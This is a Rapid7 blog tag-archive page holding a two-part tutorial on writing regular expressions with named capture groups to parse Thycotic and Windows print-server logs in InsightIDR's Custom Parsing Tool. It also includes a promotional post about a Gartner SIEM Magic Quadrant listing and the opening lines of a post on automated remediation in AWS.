Tag Archives: Detection and Response

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Post Syndicated from Teresa Copple original https://blog.rapid7.com/2021/07/08/introducing-the-manual-regex-editor-in-idrs-parsing-tool-part-2/

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

I have logs on my mind right now, because every spring, as trees that didn’t survive the winter are chopped down, my neighbor has truckloads of them delivered to his house. All the logs are eventually burned up in his sugar house and used to make maple syrup, and it reminds me that I have some logs I’d like to burn to the ground, as well!

If you’re reading this blog, chances are you probably have some of these ugly logs that are messy, unstructured, and consequently, difficult to parse. Rather than destroy your ugly logs, however tempting, you can instead use the Custom Parsing tool in InsightIDR to break them up into usable fields.

Specifically, I will discuss here how to use Regex Editor mode, which assumes a general understanding of regular expression. If you aren’t familiar with regular expression or would like a short refresher, you may want to start with Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1.

Many logs follow a standard format and can be easily parsed with the Custom Parsing tool using the default guided mode, which is quite easy to use and requires no regular expression.  You can read more about using guided mode here.

If the logs parse well with guided mode, you will likely use it to parse your logs. However, for those logs that lack good structure, common fields, or just do not parse correctly using guided mode, you may need to switch to Regex Editor mode to parse them.

Example 1: Key-Value Pair Logs Separated With Keys

Let’s start by looking at some logs in a classic format, which may not be obvious at first glance.

The first part of these logs has the fields separated by pipes (“|”). Logs that have a common field, like a pipe, colon, space, etc., separating the values are usually easy to parse and can be parsed out in guided mode.

However, the problem with these logs is that the last part contains a string that’s separated by literal strings of text rather than a set character type. For example, if you look at the “msg” field, it is an unstructured string that might contain many different characters — the end of the value is determined by the start of the next key name, “rt”.

May 26 08:25:37 SECRETSERVER CEF:0|Thycotic Software|Secret Server|10.9.000033|500|System Log|3|msg=Login Failure - ts2000.com\hfinn - AuthenticationFailed rt=May 26 2021 08:25:37 src=10.15.4.56 Raw Log/Thycotic Secret Server
May 26 08:25:37 SECRETSERVER CEF:0|Thycotic Software|Secret Server|10.9.000033|500|System Log|3|msg=Login attempt on node SECRETSERVER by user hfinn failed: Login failed. rt=May 26 2021 08:25:37 src=10.15.4.56

Let’s see how parsing these logs with the Custom Parsing Tool works. I have followed the instructions at https://docs.rapid7.com/insightidr/custom-parsing-tool/ and started parsing out my fields. Right away, you can see I’m having a problem parsing out the “msg” field in guided mode. It’s not working like I want it to!

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

This is where it is a good idea to switch to Regex Editor mode rather than continuing in guided mode. As such, I have selected the Regex Editor, and you can see that displayed here:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Whoa! This regex might look daunting at first, but just remember from our previous lesson that you can use an online regex cheat sheet or expression builder to make sense of any parts you find confusing or unclear.

Here is what the Regex Editor has so far, based on the two fields I added from guided mode (date and message):

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[^d]*d)

The regular expression for the field I decided to name “message” is the part that’s not working like I want. So, I need to edit this part: (?P<message>[^d]*d).

Remember, this is a capture group, so the regular expression following the field name, “<message>”, will be used to read the logs and extract the values for each one. In other words, in Log Search, the key-value pair will be extracted out from the logs as follows:

(?P<key>regex that will extract the value)

[^d]*d” is not working, so let’s figure out how to replace that. There are a lot of ways to go about crafting a regular expression that will extract the field. For example, one option might be to extract every character until you get to the next literal string:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>.*)rt=

This works, but it is somewhat inefficient for parsing. It’s outside our scope here to discuss why, but in general, you should not use the dot star, “.*”, for parsing rules. It is much more efficient to define what to match rather than what to not match, so whenever possible, use a character class to define what should be matched.

Create the character class and put all possible characters that appear in the field into it:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[\w\s\.-\\]+)

These Thycotic logs have a lot of different characters appearing in the “msg” field, so defining a character class like I’m doing here, “[\w\s\.-\\]”, is a bit like playing pin the tail on the donkey, in that I hope I get them all!

Let’s look at another way to extract a text string when it does not have a standard format. Remember that “\d” will match any digit character. Its opposite is “\D”, which matches any non-digit character. Therefore, “[\d\D]+” matches any digit or non-digit character:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[\d\D]+)rt=

One thing to point out here is that, although defining the specific values in the character class was a bit futzy to extract the “msg” field, this method works very well when parsing out host and user names.

In most cases, host and user names will contain only letters, numbers, and the “-” symbol, so a character class of “[\w\d-]” works well to extract them. If the names also contain a FQDN, such as “hfinn.widgets.com”, then you also need to extract the period: “[\w\d\.-]”.

Example 2: Unstructured Logs

Let’s look at some logs that are challenging to parse due to the field structure.

Logs that do not have the same fields in every log and that do not have standard breaks to delineate the fields, while nicely human readable, are more difficult for a machine to parse.

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5793	Mon May 27 16:25:31 2021 	805	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Print job diagnostics		Rendering job 71.	 2447840
<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5794	Mon May 27 16:25:31 2021 	307	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Printing a document		Document 71, Print Document owned by hfinn on lpt-hfinn01 was printed on XEROX1001 through port XEROX1001. Size in bytes: 891342. Pages printed: 2. No user action is required.	2447841

Let’s take a look at how we can parse out the fields in this log using guided mode. When you are using the Custom Parsing Tool, one of the first things you need to decide is if you want to create a filter for the rule:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

With logs, the device vendor decides what fields to create and how the logs will be structured. Some vendors create their logs so all have the same fields in every log line, no matter what the event. If your logs look like this, then you will not need to use a filter.

Other vendors define different fields depending on the type of event. In this case, you will probably need to use a filter and create a separate rule for each type of event you want to parse. Another reason to use a filter is that you just want to parse out one type of event.

Looking at my Microsoft print server logs closely, you can see that the second log has quite a few more fields than the first one: document name printed, the document owner, what printer it was printed on, size, pages printed, and if any user action is required. As such, I’m going to need to use filters and create more than one rule here.

The filter should be a literal string that is part of the logs I want to parse. In other words, how can the parsing tool know which logs to apply this rule to? Let’s start with the first type of log:

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5793	Mon May 27 16:25:31 2021 	805	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Print job diagnostics		Rendering job 71.	 2447840

Its type is “Print job diagnostics”, so that seems like a good string to match on. I will use that for my filter.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Still in the default guided mode, I’ll start extracting out the fields I want to parse. I don’t need to parse them all, just the ones I care about. As I am working my way through the log, I find that I am not able to extract the username like I want:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

I am going to continue for the moment, however, using guided mode to define the last field I need to add.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Let’s pause for a moment. I’ve created four fields. Three of them are fine, but the “source_user” field is not parsing correctly. I am going to switch now to Regex Editor mode to fix it.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The regex created by the Custom Parsing Tool in guided mode is:

^(?:[^ ]* ){3}(?P<source_host>[^ ]+)(?:[^ ]* ){4}(?P<datetime>[^	]+)[^m]+(?P<source_user>[^ ]+)[^P]+(?P<action>[^	]+)

The only part I need to look at is the capture group for the field I called “source_user”:

(?P<source_user>[^ ]+)

With that said, the issue with the rule could be somewhere else in the parsing rules. However, let’s just start with the one capture group. Let’s interpret the character class first: “[^ ]”.  

When the hat symbol (“^”) appears in a character class, it means “not”. The hat is followed by a space, so the character class is “not a space”. Therefore, “[^ ]+” means “read in values that are not spaces” or “read until you get to a space”.  

Looking at the entire parsing rule, you can see it is counting the number of spaces to define what goes into each field. This would work out fine if spaces were the field delimiters, but that’s not how these logs work. The logs are a bit unstructured in the sense that some of the fields are defined by literal strings and others are just literal strings themselves.

Also, guided mode had a few too many beers while trying to cope with these silly logs and decided that the “source_user” field should always start with the letter “m”:

[^m]+(?P<source_user>[^ ]+)  

Oops! We don’t want that! Let’s get rid of it, plus the “[^P]+”, which means to read to a literal capital P: this is how it is rolling past everything to the “Print job diagnostics”, but we can do better than that.

As humans, we know that we want the “action” field to be the literal string “Print job diagnostics”, which the Custom Parsing Tool doesn’t know. Let’s just fix these few things first. I made these changes, clicked on Apply to test them, and got an error:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

This error means I’ve goofed, and the rule does not match my logs. I know I’m on the right path, though, so I’m going to continue. The problem here is with how the regex is going from “datetime” to “source_user” and then to “action”.

Let’s stop for a moment to look at this regex:

(?:[^ ]*){3}

The “(?P<keyname>)” structure that we’ve been using is a capture group. The “(?:)” structure is a non-capture group. It means that regex should read this but not actually capture it or do anything with it. It’s also how we are going to skip past the fields we don’t want to parse. The “{3}” means “three times”. Of course, we have already seen that “[^ ]*” means “not a space” or “read until you get to a space”. So, the whole non-capture group “(?:[^ ]*){3}“ means “read everything to the next space, three times” or “skip past everything that is in the log until you have read past three spaces”.

Now, let’s look at an actual log:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The last field we read in was “datetime”, and then, we need to skip over to the “source_user” field. Let’s try to do that by skipping past the three spaces until we get there.

Next, from the “source_user” to the last field, “action”, there are four spaces. Here is my regex:

^(?:[^ ]* ){3}(?P<source_host>[^ ]+)(?:[^ ]* ){4}(?P<datetime>[^ ]+)(?:[^ ]* ){3}(?P<source_user>[^ ]+)(?:[^	]* ){4}(?P<action>Print job diagnostics)

I have added “(?:[^ ]* ){3}“ to skip past 3 spaces and done the same thing later to skip past 4 spaces, using a “{4}” to denote 4 spaces. Let’s see if it works:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The tool seems to be happy with this, as all the fields appear correctly, so I will go ahead with applying and saving this rule.

If you are at this spot with your logs except the tool is not happy and you are getting an error, I have a couple of tips for you to try:

  • Sometimes, the tool works better if you do parse every field, even if you do not particularly care about them. Try parsing every field to see if that works better for you.
  • Occasionally, it is easier to just parse out one (or maybe two or three) fields per rule. This is especially true if the logs are very messy and the fields have little structure. If you are really stuck, try to parse out just one field at a time. It is okay to have several parsing rules per log type, if necessary.
  • Try to proceed one field at a time, if possible. Get the one field extracted correctly, and then proceed to the next one.

When you create a parsing rule, it will apply to new logs that are collected. I have waited a bit for more logs to come in, and I can see they are now parsing as expected.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Now, I need to create a second rule for the next type of log. Here is what those logs look like

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5794	Mon May 27 16:25:31 2021 	307	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Printing a document  Document 71, Print Document owned by hfinn on lpt-hfinn01 was printed on XEROX1001 through port XEROX1001. Size in bytes: 891342. Pages printed: 2. No user action is required.	2447841

When you create a second (or third, fourth, etc.) parsing rule for the same logs, the Custom Parsing Tool does not know about the previous rules. You will need to start any additional rules just as you did the first one.

Also, just like before, as I am creating the parsing rule, I will need to apply a filter to match these logs. The type of log is “Printing a document”, so I will use that as the filter.

Again, I will start in guided mode and define the fields I want to start parsing out — it isn’t required to start in guided mode but, sometimes, that is easier. I defined a few fields, and as you can see, the parsing is not working like I need.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Now that I have the fields defined, I’ll switch to Regex Editor mode.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The regex that was generated in guided mode is:

^(?:[^ ]* ){4}(?P<datetime>[^ ]+)[^h]{36}(?P<source_user>[^ ]+)\D{18}(?P<source_host>[^	]+) (?P<action>[^ ]+)	(?P<printed_document>(?:[^ ]* ){3}[^ ]+)(?:[^ ]* ){6}(?P<owner>[^ ]+)

Just like before, I am going to clean this up a bit, starting with the first field and working from left to right, modifying the regex to parse out the keys like I want.

The first part of the regex, “^(?:[^ ]* ){4}(?P<datetime>[^ ]+)”, says to skip past the first four spaces and read the next part into the datetime key until a fifth space is read. This first part is fine and parsing out the field as needed, so let’s move on to the next part, “[^h]{36}(?P<source_user>[^ ]+)”.  

For simplicity and functionality, I am going to swap out the way the regex is skipping over to the username, “[^h]{36}”, with “(?:[^ ]* ){3}”.  This is using the same logic as the first rule: skip past three spaces to find the next value to read in.  

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

These first two fields are working, so let’s move to the next one, “source_host”. The regex for skipping over to this field and parsing it is: “\D{18}(?P<source_host>[^ ]+)”.

While this might look odd, the “\D{18}” part is how regex skips over the literal string “User Information”.  We looked at “\D” previously; the “\D” means to match “any non-digit character”, and the “{18}” means “18 times”. In other words, skip forward 18 non-digit characters. This is working well, and there is no need for any tinkering.

The next field is “(?P<action>[^ ]+)”, and just like the previous one, this field is properly parsed out. If a field is properly parsed, then there is no need to make any changes.

Now, I am getting to the messiest field in the logs, which is the name of the document that was printed. You can see that the field should contain all the text between “Printing a document” and “owned by”, and it is not being correctly parsed with the auto-generated regex.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Hey, we humans are still better at some things than machines! While this field is easy for us to make out, machine-generated regex has difficulty with these types of fields.

Let’s look at the current method that regex is using. The field is parsed with “(?P<printed_document>(?:[^ ]* ){3}[^ ]+)”, which means the parser is counting spaces to try to determine the field, and that just doesn’t work here. We need to craft a regular expression that will parse everything until we get to “owned by”, no matter what it is.

The best way to do this is to create a character class that includes all the possible characters that might be in the field to be extracted. Because a document can contain any possible character, I am going to use the class “[\d\D]”, which I used previously. To say “followed by the literal string owned by”, I need to be careful and take into account the spaces.

Spaces can be a little tricky in that, sometimes, what your eyes perceive as one space are several. To be on the safe side, instead of specifying one space with “\s” you might want to use “\s+”. You could also put an actual space there. That is what the auto-generated regex has; however, I prefer to use the “\s+” notation as it makes it clear that I want to match one or more spaces.

(?P<printed_document>[\d\D]+)\s+owned\s+by\s+

Before continuing, I am checking to make sure the “printed_document” field is parsed properly.  

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

It all looks good! If it didn’t, I would fiddle with the parsing until it did. The last field owner is parsing correctly, as well

Drat! I need to extract one more field, and I forgot to define it in guided mode. That’s okay, however, because I can go ahead and add it right now. All I need to do is to create a named capture group for it.

We looked at the syntax for a named capture group earlier:

(?P<key>regex that will extract the value)

I want to collect how many pages were printed, so let’s look at our logs again. I’m working on this part of the log:

owned by mstewart on \\L-mstewart03 was printed on Adobe PDF through port Documents\*.pdf. Size in bytes: 0. Pages printed: 13.

I need to skip forward from the “owned by” value all the way over to “Pages printed”. The fields in between might have different numbers of spaces, characters, etc., which means I can’t count spaces like I did before. I can’t count the number of characters, either.

Let’s use our old friend “[\d\D]”:    

(?:[\d\D]+)Pages printed:\s+(?P<pages_printed>\d+)

The tool seems happy with this, as there are no errors when I click on Apply, and the fields in the Log Preview appear to be correct.

When I apply and save this rule, I wait for a few more logs to come in to see if the parsing rule is working like I want. In Log Search, here is a parsed log line:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

You might be wondering what the “\t” is all about. The “\t” is a tab or space character, and I’m not quite satisfied with my parsing rule. I didn’t spot when I saved it that there is a space being captured at the beginning of the field. If you find, after you save a rule, that it isn’t working like you want, you can either delete it and start over or just modify the existing rule.

I am going to modify my rule and fix it. Here is my final regex with the extra spaces accounted for:

^(?:[^ ]* ){4}(?P<datetime>[^ ]+)(?:[^	]* ){3}(?P<source_user>[^	]+)\D{18}(?P<source_host>[^	]+) (?P<action>[^ ]+)\s+(?P<printed_document>[\d\D]+)\s+owned\s+by\s+(?P<owner>[^ ]+)(?:[\d\D]+)Pages printed:\s+(?P<pages_printed>\d+)

And that’s it! With this guide, you have now learned how to use the Custom Parsing tool in InsightIDR to break up ugly logs into usable fields.


Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Post Syndicated from Teresa Copple original https://blog.rapid7.com/2021/07/06/introducing-the-manual-regex-editor-in-idrs-parsing-tool-part-1/

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

New to writing regular expressions? No problem. In this two-part blog series, we’ll cover the basics of regular expressions and how to write regular expression statements (regex) to extract fields from your logs while using the custom parsing tool. Like learning any new language, getting started can be the hardest part, so we want to make it as easy as possible for you to get the most out of this new capability quickly and seamlessly.

The ability to analyze and visualize log data — regardless of whether it’s critical for security analytics or not — has been available in InsightIDR for some time. If you prefer to create custom fields from your logs in a non-technical way, you can simply head over to the custom parsing tool, navigate through the parsing tool wizard to find the “extract fields” step, and drag your cursor over the log data you’d like to extract to begin defining field names.

The following guide will give you the basic skills and knowledge you need to write parsing rules with regular expressions.

What Are Regular Expressions?

In technical applications, you occasionally need a way to search through text strings for certain patterns. For example, let’s say you have these log lines, which are text strings:

May 10 12:43:12 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The server could not be contacted. rt=May 10 2021 12:43:12
May 10 12:43:41 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The RPC Server is unavailable. rt=May 10 2021 12:43:41

You need to find the message part of the log lines, which is everything between “msg=” and “rt=”.  With these two log lines, I might hit the easy button and just copy the text manually, but clearly, this approach won’t work if I have hundreds or thousands of lines from which I need to pull the field out.

This is where regular expression, often shortened to regex, comes in. Regex gives you a way to search through text to match patterns, like “msg=”, so you can easily pull out the text you need.

How Does It Work?

I have a secret to share with you about regular expression: It’s really not that hard. If you want to learn it in great depth and understand every feature, that’s a story for another day. However, if you want to learn enough to parse out some fields and get on with your life, these simple tips will help you do just that.

Before we get started, you need to understand that regex has some rules that must be followed.  The best mindset to get the hang of regex, at least for a little while, is to follow the rules without worrying about why.

Here are some of the basic regular expression rules:

  • The entire regular expression is wrapped with forward slashes (“/”).
  • Pattern matches start with backslashes (“\”).
  • It is case-sensitive.
  • It requires you to match every character of the text you are searching.
  • It requires you to learn its special language for matching characters.

The special language of regular expression is how the text you are searching is matched. You need to start the pattern match with a backslash (“\”). After that, you should use a special character to denote what you want to match. For example, a letter or “word character” is matched with “\w” and a number or “digit character” is matched with “\d”.

If we want to match all the characters in a string like:

cat

We can use “\w”, as “\w” matches any “word character” or letter, so:

\w\w\w

This matches the three characters “c”, “a”, and “t”. In other words, the first “\w” matches the “c” character; “\w\w” matches “ca”; and “\w\w\w” matches “cat”.

As you can see, “\w” matches any single letter from “a” to “z” and also matches letters from “A” to “Z”. Remember: Regex is case sensitive.

“\w” also matches any number. However, “\w” does NOT match spaces or other special characters, like “-”, “:”, etc. To match other characters, you need to use their special regex symbols or other methods, which we’ll explore here.

Getting Started With Regex

Before we keep going, now is a good time to take a few minutes to find a regex “cheat sheet” you like.

Rapid7 has one you can use: https://docs.rapid7.com/insightops/regular-expression-search/, or you may have a completely different one you prefer. Whatever the case is for you, these guides are helpful in keeping track of all your matching options.

While we’re at it, let’s also find a regex testing tool we can use to practice our regex. https://regex101.com/ is very popular, as it is a tool and cheat sheet in one, although you may find another tool you want to use instead.

InsightIDR supports the version of regex called RE2, so if your parsing tool supports the Golang/RE2 flavor, you might want to select it to practice the specific flavor InsightIDR uses.

To follow along with me, open your preferred tool for testing regex. Enter in some text to match and some regex, and see what happens!

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Let’s look at another way to match the string “cat”. You can use literals, which means you just enter the character you want to match:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

This means you literally want to match the string “cat”. It matches “cat” and nothing else.  

Let’s look at another example. Say I need to match the string:

san-dc01

As we saw earlier, you can use “\w” to match the word characters. To match a number, you can use “\w” or “\d”.  “\d” will match any number or “digit”. However, how can you match the “-”?

The dash (“-”) is not a word character, so “\w” does not match it. In this case, we can tell regex we want to match the “-” literally:

\w\w\w-\w\w\d\d

There are other options, as well. The dot or period character (“.”) in regex means to match any single character. This works to parse out the string “san-dc01”, as well:

\w\w\w.\w\w\d\d

While this works, it is tedious typing all these “\w”s. This is where wildcards, sometimes called regex quantifiers, come in handy.

The two most common are:

* match 0 or more characters

+ match 1 or more characters

“\w*” means “match 0 or more word characters”, and “\w+” means “match 1 or more word characters”.

Let’s use these new wildcards to match some text. Say we have these two strings:

cat

san-dc01

I want one regex pattern that will match both strings. Let’s match “cat” first. The regex we used previously:

\w\w\w

matches the string, so you can see that using this wildcard would work, too:

\w+

Now, let’s look at matching “san-dc01”. I can use this:

\w+-\w+

This means “match as many word characters as there are, followed by a dash, and then followed by as many word characters as there are”. However, while this matches “san-dc01”, it does not match “cat”. The string “cat” has no “-” followed by characters.

The regex we added, “-\w+”, only matches a string if the “-” character is part of the string. In addition, “\w+” means “match one or more numbers”. In other words, “\w+” means “match at least one word character up to as many as there are”. As such, we need to use “\w*” here instead to specify that the “dc01” part of the string might not always exist. We also need to use “-*” to specify that the “-” might not always exist in the string we need to match, either.

Therefore, this should work to parse both strings:

\w+-*\w*

By now, you may have noticed something else important about regex: There are usually many different patterns that will match the same text.

Sometimes, I find that people get snooty about their regex, and these people might mock you if they think you could have crafted a shorter pattern or a more efficient one. A pox on their house!  Don’t worry about that right now. It’s more important that your regex pattern works than it is that it be short or impressively intricate.

Let’s look at another way to match our strings: You can use a character class for matching.

The character class is defined by using the square brackets “[“ and “]”. It simply means you want regex to match anything included in your defined class.

This is easier than it sounds! Since our strings “cat” and “san-dc01” contain characters that match either “\w” or the literal “-”, our character class is “[\w-]”.

Now, we can use the “+” to specify that our string has one or more characters from the character class:

[\w-]+

Additional Regular Expressions for Log Parsing

Besides “\w” and “\d”, I have a few more regular expressions I want you to pay close attention to. The first one is “\s”, which is how you match whitespaces.

“\s” will match any whitespace character, and “\s+” will match one or more whitespace characters.

Next, remember that the dot (“.”) will match any character. The dot becomes especially powerful when you combine it with the star (“*”).  Remember: The star means to match 0 or more characters. Therefore, the “dot star” (“.*”) will match any characters as many times as they appear, including matching nothing. In other words, “.*” matches anything.

Finally, let’s look at special uses of the circumflex character, which is often just called the hat (“^”).

The hat has two completely different uses, which should not be confused. First, when used by itself, the hat in regex designates where the beginning of the line starts. For example, “^\w+” means that the line must start with a word.

The second use of the hat is when it appears in a character class. If you use the hat character when defining a character class, it means “everything except” as in “match everything except these characters”. In other words, “[\d]+” would match any digit character, while “[^\d]+” means to do the opposite or match everything except for any digit character!

Log Parsing Examples

Let’s go back to where we started, trying to parse out the msg field from our logs:

May 10 12:43:12 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The server could not be contacted. rt=May 10 2021 12:43:12
May 10 12:43:41 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The RPC Server is unavailable. rt=May 10 2021 12:43:41

Have you copied and pasted these log lines into your regex tester? If not, go ahead and do so now.

We need to parse a literal string “msg=”. These literals in log lines are often the “key” part of a key-value pair and are sometimes called anchors instead of literals, since they are the same in every log line. To parse them, you would usually specify the literal string to match on.

Next, we need to read the value that follows. You have a few different approaches you can use here. A common way to parse the value is to read everything that follows until the next literal or anchor. Remember: There are many ways to do this, but your regex might look like this:

msg=.*rt=

By the way, if you are familiar with regex, you know that the greedy “*” creates inefficient parsing rules, but let’s not worry too much about that right now. The skinny on this, however, is that you should never use the dot star (“.*”) for parsing rules. It is useful for searches and trying to figure out log structure, though.

Another way to read the value is to use a character class:

msg=[\w\s\.]+rt=

Let’s break the character class down to determine exactly what is specified. “\w” means match any word character. “\s” means to match any space. We also need to match a literal period, since that appears in the msg value, but the period or dot has a special meaning in regex. When characters have special meaning in regex, like the slashes, brackets, dot, etc, they need to be “escaped”, which you do by putting a backslash (“\”) in front of them. Therefore, to match the period, we need to use “\.” in the character class.

Remember: Defining a character class means you want to match any character defined in the class, and the “+” at the end of the class means to “match one or more of these characters”. In that case, “[\w\s\.]+” means “match any word character, any space, or a period as many times as it occurs”. The matching will stop when the next character in the sequence is not a word character, a space, or a period OR when the next part of the regex is matched. The next part of the regex is the literal string “rt=”, so the regex will extract the “[\w\s\.]+” characters until it gets to “rt=”.

Finally, there is just one more regex syntax that is helpful to understand when using regex with InsightIDR, and that is the use of capture groups. A capture group is how you define key names in regex. Capture groups are actually much more than this, but let’s narrow our focus to just what we need to know for using them with InsightIDR. To specify a named capture group for our purposes, use this syntax:

(?P<keyname>putyourregexhere)

The regex you put into the capture group is what is used to read the value that is going to match the “keyname”. Let’s see how this works with our logs.

Say we have some logs in key-value pair (KVP) format, and we want to both define and parse out the “msg” key. We know this regex works to match our logs: “msg=[\w\s\.]+rt=”. Now, we need to take this one step further and define the “msg” key and its values. We can do that with a named capture group:

msg=(?P<msg>[\w\s\.]+)rt

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Let’s break this down. We want to read in the literal string “msg=” and then place everything after it into a capture group, stopping at the literal string “rt=”. The capture group defines the key, which you can also think of as a “field name”, as “msg”: “(?P<msg>”.

If we wanted to parse the field name as something else, we could specify that in between the “<>”. For example, if we wanted the field name to be “message” instead of “msg”, we would use: “(?P<message>”.

The regex that follows is what we want to read for the value part of our key-value pair. In other words, it is what we want to extract for the “msg”. We already know from our previous work that the character class “[\w\s\.]” matches our logs, so that’s what is used for this regex.

In this blog, we explored the regex syntax we need for InsightIDR and used a generic tool to test our regular expressions. In the next blog, we’ll use what we covered here to write our own parsing rules in InsightIDR using the Custom Parsing Tool in Regex Editor mode.


Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

Post Syndicated from Meaghan Donlon original https://blog.rapid7.com/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/

Rapid7 is elated for InsightIDR to be recognized as a Leader in the 2021 Gartner Magic Quadrant for Security Information and Event Management (SIEM).

Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

This is the second consecutive time our SaaS SIEM—InsightIDR—has been named a Leader in this report. Access the full complimentary report from us here.

The Gartner Magic Quadrant reports provide a matrix for evaluating technology vendors in a given space. The framework looks at vendors on two axes: completeness of vision and ability to execute. In the case of SIEM, “Gartner defines the security and information event management (SIEM) market by the customer’s need to analyze event data in real time for early detection of targeted attacks and data breaches, and to collect, store, investigate and report on log data for incident response, forensics and regulatory compliance.”

As the detection and response market becomes more competitive, and the demands and challenges of this space grow more complex, we are honored to be recognized as one of the 6 2021 Magic Quadrant Leaders named in this report. We believe we are recognized for our usability and customer experience, as these are areas we’ve invested heavily in and recognize as critical to the success of today’s detection and response programs.

"This Product has surpassed expectations" – Security Analyst, Energies and Utlities ★★★★★

Thank you

First and foremost, we want to thank our Rapid7 InsightIDR customers and partners for being on this journey with us. Your ongoing feedback, partnership, and trust have fueled our innovation and uncompromising commitment to delivering sophisticated security outcomes that are accessible to all.

Access the full 2021 Gartner Magic Quadrant report here.

Accelerated change escalates challenges around modern detection and response

The last year has brought a swell of change for many organizations, including rapid cloud adoption, increased use of web applications, a significant shift to remote working, and new threats brought on by attackers exploiting circumstances around the pandemic. While these challenges weren’t new, their increased urgency highlighted cracks in an already fragile security ecosystem:

  • Increased cybersecurity demands widened the already growing skills gap
  • Uptime trumped security, often leaving SecOps professionals scrambling to keep up
  • The combination of these stresses drove many teams to a breaking point with alert fatigue

These market dynamics prompted a lot of Security Operations Center (SOC) teams to reevaluate current processes and systems, and push for change.

Rapid7 InsightIDR helps teams focus on what matters most to drive effective threat detection and response across modern IT environments

Our approach to detection and response has always been directed by what we hear from customers. This includes industry engagement and insights gathered through Rapid7’s research and open source communities, our firsthand experience with Rapid7 MDR (Managed Detection and Response) and services engagements, and of course, direct customer feedback. These collective learnings have enabled us to deeply understand the challenges facing SOC teams today, and pushed us to develop innovative solutions to anticipate and address their needs.

Rapid7 InsightIDR is not another log-aggregation-focused SIEM that sits on the shelf, or one that leaves the difficult and tedious work for security analysts to figure out on their own. Rather, our focus has always been to provide immediate, actionable insights and alerts that teams can feel confident responding to so they can extinguish threats quickly. With Rapid7 InsightIDR, security analysts are no longer fighting just to keep up. They’re empowered to scale and transform their security programs, however and wherever their environments evolve.

We are thrilled about this recognition, but like everything in cybersecurity, what’s most exciting is what happens next. We are committed to continually raising the bar and making it easier for SOC teams to accelerate their detection and response programs, while removing the distractions and noise that get in the way. Thank you again to our customers and partners for joining this journey with us. And stay tuned for more updates ahead soon!

"InsightIDR is my favorite SIEM because the preloaded detections for attacker tactics and techniques. The threat community within the platform is always providing new detections for IOCs. The team is always pleasant to work with, and I love all the feature updates we received this year!" – Information Security Engineer ★★★★★

Access the full 2021 Gartner Magic Quadrant report here.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Rapid7.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner Magic Quadrant for Security Information and Event Management (SIEM), Kelly Kavanagh, Toby Bussa, John Collins, 29 June 2021.

Automated remediation level 4: Actual automation

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/06/automated-remediation-level-4-actual-automation/

Let’s get to automatically remediating already!

Automated remediation level 4: Actual automation

This entry will be the last in our series based on The 4 Levels of Automated Remediation. After the previous 3 steps—where we discussed everything from logging to best practices to account hygiene—it’s time to talk about the actions that really let you calibrate and control the kind of remediation you’re looking to get out of the process. We’ll once again use AWS as our case study and jumping-off point for keeping your cloud environments clean and (as) free (as possible) of misconfigurations at this “classic” level of automated remediation.

Key off on APIs

